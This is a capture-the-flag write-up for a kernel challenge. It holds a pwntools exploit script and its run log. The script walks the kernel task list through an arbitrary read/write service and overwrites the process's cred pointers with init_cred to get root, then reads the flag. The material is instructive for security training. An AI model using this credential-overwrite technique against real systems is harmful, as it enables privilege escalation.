Tags: pwn kernel 

Rating: 1.0

[@javierprtd](https://twitter.com/javierprtd)

```
# -*- coding:utf-8 -*-
from pwn import *

IOCTL_READ = 901   # ioctl numbers of the challenge driver; not referenced below (presumably what the text menu wraps)
IOCTL_WRITE = 902

# task_struct field offsets for this kernel build: the loop at the bottom
# treats OFFSET_TASKS as the `tasks` list_head and OFFSET_COMM as `comm`.
# NOTE(review): verify against the vmlinux's struct layout before reuse.
OFFSET_COMM = 0x408
OFFSET_TASKS = 0x210

e = ELF('./vmlinux')   # kernel image, used only to resolve init_task / init_cred symbols

def menu(n):
    """Pick entry *n* from the service's text menu.

    Blocks until the "> " prompt arrives, then sends the entry number as a
    line.  Uses the module-level ``io`` tube.
    """
    choice = str(n)
    io.recvuntil("> ")
    io.sendline(choice)

def read(p):
    """Return the 64-bit value the service reports for kernel address *p*.

    Drives menu entry 1 ("Read"): sends the address as bare hex, skips the
    two banner lines, then parses the 16 hex digits that follow.  The NUL
    padding in ``ljust`` is kept from the original; note that if fewer than
    16 bytes arrive the padded text is not valid hex and ``int`` raises
    ``ValueError``.
    """
    menu(1)
    io.recvuntil(">")
    io.sendline('{:02x}'.format(p))
    io.recvuntil("Got everything I need. Let's do it!")
    io.recvuntil("We're back. Our scouter says the power level is: ")
    digits = io.recv(16).ljust(16, '\0')
    return int(digits, 16)

def write(p, v):
    """Store the 64-bit value *v* at kernel address *p* via menu entry 2.

    Address and value are each sent as a bare hex string after a ">"
    prompt.  Nothing is read back, so there is no return value.
    """
    menu(2)
    for field in (p, v):
        io.recvuntil(">")
        io.sendline('{:02x}'.format(field))

def show_id():
    """Print the two reply lines of menu entry 3 ("Show me my uid")."""
    menu(3)
    first = io.recvline()
    second = io.recvline()
    print first + second

def read_file(name):
    """Ask the service (menu entry 4) to read *name* and print its three reply lines."""
    menu(4)
    io.recvuntil(">")
    io.sendline(name)
    reply = [io.recvline() for _ in range(3)]
    print "".join(reply)

def exit():
    """Send menu entry 6 ("Bye!") to close the session.

    This deliberately shadows the ``exit`` builtin for the rest of the
    module, so ``exit()`` here talks to the service, not the interpreter.
    """
    menu(6)

io = remote("babykernel2.forfuture.fluxfingers.net", 1337)

# Kernel symbol addresses come straight from the unstripped vmlinux; the
# service hands out reads and writes of kernel memory, so no leak is needed.
init_task = e.sym['init_task']
init_cred = e.sym['init_cred']
print "[+] init_task: 0x%08x" % init_task
print "[+] init_cred: 0x%08x" % init_cred

# Walk the circular task list from init_task.  The `tasks` list_head sits
# OFFSET_TASKS into each task_struct, so subtracting the offset from the
# `next` pointer gives the following task_struct base.  Stop at the first
# task whose comm contains "client_k", or when the list wraps back around.
comm = ""
task = 0
ptask = init_task
while True:
    task = read(ptask + OFFSET_TASKS) - OFFSET_TASKS
    comm = read(task + OFFSET_COMM)
    # comm is returned as a little-endian integer: render as hex, unhex,
    # and reverse the bytes to recover the process name.  (This rebinds the
    # `process` name that `from pwn import *` exports.)
    process = '{:02x}'.format(comm).decode("hex")[::-1]
    print "[+] 0x%08x -> %s" % (task, process)
    if "client_k" in process:
        break
    ptask = task
    if task == init_task:
        break

# Repoint the two pointers immediately preceding comm at init_cred.
# NOTE(review): these are presumably `real_cred` (-16) and `cred` (-8) —
# confirm against this kernel's task_struct layout.  The transcript below
# shows the uid reported as root afterwards.
for delta in (8, 16):
    write(task + OFFSET_COMM - delta, init_cred)

io.interactive()

# Transcript of the original run, kept as a bare string literal (never
# executed): reference output for the task-list walk and the uid check
# that follows the credential-pointer overwrite.
'''
[+] Opening connection to babykernel2.forfuture.fluxfingers.net on port 1337: Done
[+] init_task: 0xffffffff8181b4c0
[+] init_cred: 0xffffffff8183f4c0
[+] 0xffff888000028000 -> init\x00er
[+] 0xffff888000029180 -> kthreadd
[+] 0xffff88800002a300 -> rcu_gp\x00d
[+] 0xffff88800002b480 -> rcu_par_
[+] 0xffff88800002c600 -> kworker/
[+] 0xffff88800002d780 -> kworker/
[+] 0xffff88800002e900 -> kworker/
[+] 0xffff888000058000 -> mm_percp
[+] 0xffff888000059180 -> ksoftirq
[+] 0xffff88800005a300 -> rcu_pree
[+] 0xffff88800005b480 -> rcu_sche
[+] 0xffff88800005c600 -> rcu_bh\x00d
[+] 0xffff88800005d780 -> kdevtmpf
[+] 0xffff88800005e900 -> rcu_task
[+] 0xffff888000118000 -> kworker/
[+] 0xffff888000119180 -> oom_reap
[+] 0xffff88800011a300 -> writebac
[+] 0xffff88800011b480 -> kswapd0
[+] 0xffff88800011c600 -> acpi_the
[+] 0xffff88800011d780 -> kworker/
[+] 0xffff88800011e900 -> kworker/
[+] 0xffff888003373480 -> sh\x00t\x00er
[+] 0xffff888003371180 -> client_k
[*] Switching to interactive mode

ffffffff8183f4c0
Thanks, boss. I can't believe we're doing this!
Amazingly, we're back again.
----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read file
5. Any hintz?
6. Bye!
> $ 3
3
uid=0(root) gid=0(root)
----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read file
5. Any hintz?
6. Bye!
> $ 4
4
Which file are we trying to read?
> $ /flag
/flag
Here are your 0x35 bytes contents:
flag{nicely_done_this_is_how_a_privesc_can_also_go}
'''
```